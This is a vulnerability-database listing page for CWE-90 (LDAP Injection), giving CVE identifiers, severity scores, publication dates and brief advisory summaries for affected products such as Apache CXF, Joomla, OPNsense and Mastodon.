CWE-90 · LDAP Injection
54 CVEs classified under CWE-90 (LDAP Injection). Browse by severity and year.
| CVE | Severity | Score | Published | Summary |
|---|---|---|---|---|
CVE-2026-44930 | Critical | 9.8 | 2026-05-22 | An LDAP injection vulnerability in the LDAP Certificate repository of the XKMS server in Apache CXF may allow an attacker to retrieve arbitrary certificates fr… |
CVE-2017-14596 | Critical | 9.8 | 2017-09-20 | In Joomla! before 3.8.0, inadequate escaping in the LDAP authentication plugin can result in a disclosure of a username and password. |
CVE-2017-8790 | Critical | 9.8 | 2017-05-05 | An issue was discovered on Accellion FTA devices before FTA_9_12_180. The home/seos/courier/ldaptest.html POST parameter "filter" can be used for LDAP Injectio… |
CVE-2016-9299 | Critical | 9.8 | 2017-01-12 | The remoting module in Jenkins before 2.32 and LTS before 2.19.3 allows remote attackers to execute arbitrary code via a crafted serialized Java object, which… |
CVE-2026-41919 | Critical | 9.1 | 2026-05-19 | Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24… |
CVE-2026-33289 | High | 8.8 | 2026-03-19 | SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. Prior to versions 7.15.1 and 8.9.3, an LDAP Injection… |
CVE-2019-11277 | High | 8.4 | 2019-09-23 | Cloud Foundry NFS Volume Service, 1.7.x versions prior to 1.7.11 and 2.x versions prior to 2.3.0, is vulnerable to LDAP injection. A remote authenticated malic… |
CVE-2026-40193 | High | 8.2 | 2026-04-15 | maddy is a composable, all-in-one mail server. Versions prior to 0.9.3 contain an LDAP injection vulnerability in the auth.ldap module where user-supplied user… |
CVE-2026-34578 | High | 8.2 | 2026-04-09 | OPNsense is a FreeBSD based firewall and routing platform. Prior to 26.1.6, OPNsense's LDAP authentication connector passes the login username directly into an… |
CVE-2026-44304 | High | 8.1 | 2026-05-12 | Lemur manages TLS certificate creation. Prior to 1.9.0, Lemur's LDAP authentication module (lemur/auth/ldap.py) constructs LDAP search filters using unsanitize… |
CVE-2021-41232 | High | 8.1 | 2021-11-02 | Thunderdome is an open source agile planning poker tool in the theme of Battling for points. In affected versions there is an LDAP injection vulnerability whic… |
CVE-2023-28853 | High | 7.7 | 2023-04-04 | Mastodon is a free, open-source social network server based on ActivityPub Mastodon allows configuration of LDAP for authentication. Starting in version 2.5.0… |
CVE-2020-5246 | High | 7.7 | 2020-07-14 | Traccar GPS Tracking System before version 4.9 has a LDAP injection vulnerability. It occurs when user input is being used in LDAP search filter. By providing… |
CVE-2023-29050 | High | 7.6 | 2024-01-08 | The optional "LDAP contacts provider" could be abused by privileged users to inject LDAP filter strings that allow to access content outside of the intended hi… |
CVE-2023-3447 | High | 7.6 | 2023-06-29 | The Active Directory Integration / LDAP Integration plugin for WordPress is vulnerable to LDAP Injection in versions up to, and including, 4.1.5. This is due t… |
CVE-2026-44671 | High | 7.5 | 2026-05-14 | ZITADEL is an open source identity management platform. From 2.71.11 to before 3.4.10 and 4.15.0, a vulnerability was discovered in Zitadel's LDAP identity pro… |
CVE-2025-67493 | High | 7.5 | 2025-12-17 | Homarr is an open-source dashboard. Prior to version 1.45.3, it was possible to craft an input which allowed privilege escalation and getting access to groups… |
CVE-2017-4927 | High | 7.5 | 2017-11-17 | VMware vCenter Server (6.5 prior to 6.5 U1 and 6.0 prior to 6.0 U3c) does not correctly handle specially crafted LDAP network packets which may allow for remot… |
CVE-2015-7294 | High | 7.5 | 2017-09-06 | ldapauth-fork before 2.3.3 allows remote attackers to perform LDAP injection attacks via a crafted username. |
CVE-2024-56841 | High | 7.4 | 2025-01-14 | A vulnerability has been identified in Mendix LDAP (All versions < V1.1.2). Affected versions of the module are vulnerable to LDAP injection. This could allow… |